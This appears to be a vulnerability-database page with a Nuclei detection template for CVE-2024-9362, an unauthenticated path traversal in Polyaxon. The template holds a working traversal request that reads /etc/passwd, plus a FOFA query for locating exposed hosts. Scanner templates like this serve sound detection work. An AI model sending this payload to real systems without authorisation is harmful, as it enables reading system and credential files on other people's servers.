Polyaxon - Unauthenticated Directory Traversal
CVE-2024-9362
Verified
Description
Polyaxon latest version contains a path traversal caused by insufficient validation in directory access, letting unauthenticated attackers retrieve directory information and file contents, exploit requires no authentication.
Severity
High
CVSS Score
7.5
Exploit Probability
25%
Published Date
May 23, 2026
Template Author
yunseo
CVE-2024-9362.yaml
id: CVE-2024-9362
info:
name: Polyaxon - Unauthenticated Directory Traversal
author: yunseo
severity: high
description: |
Polyaxon latest version contains a path traversal caused by insufficient validation in directory access, letting unauthenticated attackers retrieve directory information and file contents, exploit requires no authentication.
impact: |
Attackers can access sensitive system directories and files, leading to information disclosure and potential further exploitation.
remediation: |
Update to the latest version with patched validation mechanisms.
reference:
- https://github.com/polyaxon/polyaxon
- https://huntr.com/bounties/d8dcb40f-ce76-4524-8d06-e0f12a07809d
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-9362
epss-score: 0.24558
epss-percentile: 0.96258
cwe-id: CWE-22
metadata:
max-request: 1
verified: true
fofa-query: title=="Polyaxon"
tags: cve,cve2024,polyaxon,lfi,traversal,unauth
http:
- method: GET
path:
- "{{BaseURL}}/streams/v1/polyaxon/default/s/runs/%2e%2e/artifact?stream=true&path=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4a0a00473045022100c4ea64a68d133c1579e01a7de0c9d20c3ce74b1aee37ea74c58eb982420e808f02206015b0962cc622ef7e8c00811f2cf141d9e3289e7bf724e0caaa64cd263b5f32:922c64590222798bb761d5b6d8e729507.5Score
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
CVE ID:
cve-2024-9362
CWE ID:
cwe-22
Remediation Steps
Update to the latest version with patched validation mechanisms.